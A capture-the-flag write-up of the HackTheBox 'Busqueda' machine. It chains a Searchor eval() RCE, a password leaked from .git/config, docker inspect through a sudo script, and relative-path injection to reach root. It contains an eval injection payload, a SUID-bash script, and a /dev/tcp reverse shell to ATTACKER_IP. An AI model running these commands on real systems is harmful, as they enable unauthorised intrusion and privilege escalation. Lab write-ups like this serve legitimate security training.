Overview

Field Detail
Name Busqueda
OS Linux
Difficulty Easy
Platform HackTheBox
Topics CVE-2023-43364, Searchor 2.4.0, Python eval()

Attack Path

flowchart TD A([Attacker]) -->|CVE-2023-43364 RCE| B[Shell as svc] B -->|.git/config credential leak| C[cody:passxxx] C -->|nxc ssh credential check| D[SSH as svc] D -->|sudo -l| E[system-checkup.py as root] E -->|docker inspect gitea| F[administrator credentials] F -->|Gitea source code review| G[Path Injection via ./full-checkup.sh] G -->|SUID bash or reverse shell| H([Root Shell]) style A fill:#e74c3c,color:#fff style H fill:#2ecc71,color:#fff style G fill:#e67e22,color:#fff

1. Services Scan

A standard Nmap service scan reveals two open ports: 22 (SSH) and 80 (HTTP).

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS

Note: The redirect to searcher.htb in the Nmap output reveals the virtual hostname. Add it to /etc/hosts.

echo "TARGET_IP searcher.htb" | sudo tee -a /etc/hosts

2. Attacking HTTP (Port 80)

Scope: *.searcher.htb

The page footer discloses two key technologies:

  • Flask (Python web framework)
  • Searchor 2.4.0

Searching for Searchor 2.4.0 CVE immediately surfaces CVE-2023-43364 — a Remote Code Execution vulnerability caused by unsanitized input passed directly to Python’s eval().

sequenceDiagram participant A as Attacker participant S as Searcher App (Flask) participant E as Python eval() A->>S: POST /search?query=__import__('os').system('...') S->>E: eval(f"search(query='{input}')") E-->>A: OS command executed → Reverse Shell

3. Foothold — Shell as svc

Using a public PoC for CVE-2023-43364, a reverse shell is obtained as the svc user.

# Public PoC usage (example)
python3 poc.py http://searcher.htb ATTACKER_IP ATTACKER_PORT

Once connected, stabilize the shell immediately:

# Upgrade to a fully interactive TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Background with Ctrl+Z, then:
stty raw -echo; fg
export TERM=xterm

4. Credential Hunting — .git/config

Inspecting the web application directory reveals a Git repository with a telling config file:

cat /var/www/app/.git/config

[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
[remote "origin"]
    url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
    fetch = +refs/heads/*:refs/remotes/origin/*

Findings:

  • New subdomain: gitea.searcher.htb
  • Credentials in URL: cody:passxxx

Add the new subdomain to /etc/hosts:

echo "TARGET_IP gitea.searcher.htb" | sudo tee -a /etc/hosts

5. Credential Validation

Verify the credentials work for SSH using netexec:

nxc ssh searcher.htb -u svc -p 'passxxx'

✅ Valid — the svc account reuses cody’s password.

6. Privilege Escalation — Abusing sudo

Sudo Enumeration

sudo -l

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

The script accepts subcommands: docker-ps, docker-inspect, and full-checkup.

Step 1 — Extract Credentials via docker inspect

The target host runs a Gitea Docker container. docker inspect can dump its full configuration, including environment variables with hardcoded credentials:

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' gitea

Parse the JSON output for credentials, then log into gitea.searcher.htb as administrator.

Step 2 — Source Code Review

flowchart LR SC[system-checkup.py\nsource on Gitea] -->|Reads| FC["full-checkup handler\n./full-checkup.sh"] FC -->|Relative path!| PI[Path Injection] PI --> PE[Privilege Escalation]

The Gitea repository (accessible as administrator) contains the source of system-checkup.py. The critical flaw:

# Vulnerable snippet inside system-checkup.py
elif action == 'full-checkup':
    os.system('./full-checkup.sh')   # ← relative path, not absolute

Because the script calls ./full-checkup.sh (a relative path) and runs as root via sudo, any full-checkup.sh in the current working directory at invocation time will be executed as root.

7. Exploitation — Two Paths to Root

Method 1 — SUID Bash (Recommended ✅)

Create a malicious full-checkup.sh in a writable directory:

cd /tmp
cat > full-checkup.sh << 'EOF'
#!/bin/bash

cp /bin/bash /tmp/bash
chown root:root /tmp/bash
chmod 4755 /tmp/bash
EOF
chmod +x full-checkup.sh

Run the privileged script from /tmp:

sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

Use the SUID bash to get a root shell:

/tmp/bash -p
whoami   # root

Method 2 — Reverse Shell as root

Create a reverse shell payload (use revshells.com to generate):

cd /tmp
cat > full-checkup.sh << 'EOF'
#!/bin/bash

/bin/bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
EOF
chmod +x full-checkup.sh

Set up your listener:

nc -lvnp PORT

Then trigger execution:

sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

💥 Root shell received on the listener.

Attack Chain Summary

flowchart LR subgraph Foothold A[CVE-2023-43364\nSearchor eval RCE] --> B[Shell: svc] end subgraph Lateral Movement B --> C[.git/config\nCredential Leak] C --> D[nxc SSH\nValidation] end subgraph Escalation D --> E[sudo system-checkup.py\ndocker inspect] E --> F[Administrator on Gitea] F --> G[Source Code Review\nRelative Path Bug] G --> H[Path Injection\nfull-checkup.sh] H --> I[Root Shell] end style A fill:#c0392b,color:#fff style I fill:#27ae60,color:#fff
Stage Technique Result
Initial Access CVE-2023-43364 (eval injection) Shell as svc
Cred Discovery .git/config plaintext password cody:passxxx
Lateral Movement SSH credential reuse Confirmed svc access
Privesc Recon docker inspect via sudo script administrator on Gitea
Privesc Path injection ./full-checkup.sh Root shell

Key Takeaways

  • Always inspect .git/ directories in web app roots — they frequently contain credentials in remote URLs.
  • Relative paths in privileged scripts (./script.sh vs /absolute/path/script.sh) are a critical misconfiguration and a classic LPE vector.
  • Docker inspect is an underrated data exfiltration vector when docker CLI access (direct or indirect) is available.
  • CVE-2023-43364 serves as a reminder that eval() on user input is never safe, regardless of language.